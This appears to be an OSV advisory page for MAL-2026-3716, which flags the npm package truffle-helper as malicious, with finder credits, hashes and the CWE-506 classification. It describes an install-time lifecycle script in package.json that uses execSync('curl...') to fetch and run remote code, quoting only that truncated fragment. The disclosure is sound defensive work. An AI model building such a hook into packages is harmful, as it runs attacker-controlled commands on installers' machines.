MAL-2026-3716

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/truffle-helper/MAL-2026-3716.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3716

Published

2026-05-13T11:53:21Z

Modified

2026-05-15T07:51:38.581957Z

Summary

Malicious code in truffle-helper (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (27652f23529349a6999e9121bc9714a5e9b5d11b227729c3c24147e5d2260eee)

package.json line 7 invokes require('child_process') and execSync('curl...') from an npm lifecycle script. This causes the installer's machine to fetch and execute remote content at install time, without user consent and without any visible integrity check. The package's declared purpose (a Truffle helper) has no legitimate need to pipe curl output through a shell during install. Any installer running npm install truffle-helper runs attacker-controlled commands on their host.

Source: ossf-package-analysis (a7ffc14f56f1b088e2835429bbdd7f07020e022594b7f123c7c58c2c12602996)

The OpenSSF Package Analysis project identified 'truffle-helper' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

The package executes one or more commands associated with malicious behavior.

Database specific

{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-13T21:58:24.364674851Z",
            "sha256": "a7ffc14f56f1b088e2835429bbdd7f07020e022594b7f123c7c58c2c12602996",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-13T12:00:42Z",
            "versions": [
                "2.0.0"
            ]
        },
        {
            "import_time": "2026-05-13T21:58:24.101332882Z",
            "sha256": "ded99697b86f732b606078ad916a3515388c413bb5180025886ef084b52ab8dd",
            "source": "ossf-package-analysis",
            "modified_time": "2026-05-13T11:53:21Z",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-002711",
            "import_time": "2026-05-15T07:37:17.681320272Z",
            "sha256": "27652f23529349a6999e9121bc9714a5e9b5d11b227729c3c24147e5d2260eee",
            "source": "amazon-inspector",
            "modified_time": "2026-05-14T19:25:17Z",
            "versions": [
                "2.0.0"
            ]
        }
    ]
}

References

https://www.npmjs.com/package/truffle-helper/v/2.0.0

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com
- OpenSSF: Package Analysis - FINDER
- - https://github.com/ossf/package-analysis
  - https://openssf.slack.com/channels/package_analysis

Affected packages

npm / truffle-helper

Package

Name: truffle-helper; View open source insights on deps.dev
Purl: pkg:npm/truffle-helper

Affected ranges

Affected versions

1.*

1.0.0

2.*

2.0.0

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "0d3e34f95fcde907f6cf11e7ac954fbfa36d4308be6dc3ecf6911f7c336ad400",
            "tlsh": "0011f11ecb240eb32ec41a552d291989b177846b0b00bc54f2bb421dc34d5ff89ff64a"
        }
    ],
    "package_integrity": [
        {
            "filename": "truffle-helper-2.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-uudykehREigi5mJLOMYMAchRX1UtnquaX9J+i9NqQEPyG2/As6605GXA89b/tGKixvToSqtf18LfPdOaxcDtLw==",
                "sha1": "5a0a7fda5de6389df808e5f0bea762920cb3e6f6"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/truffle-helper/MAL-2026-3716.json"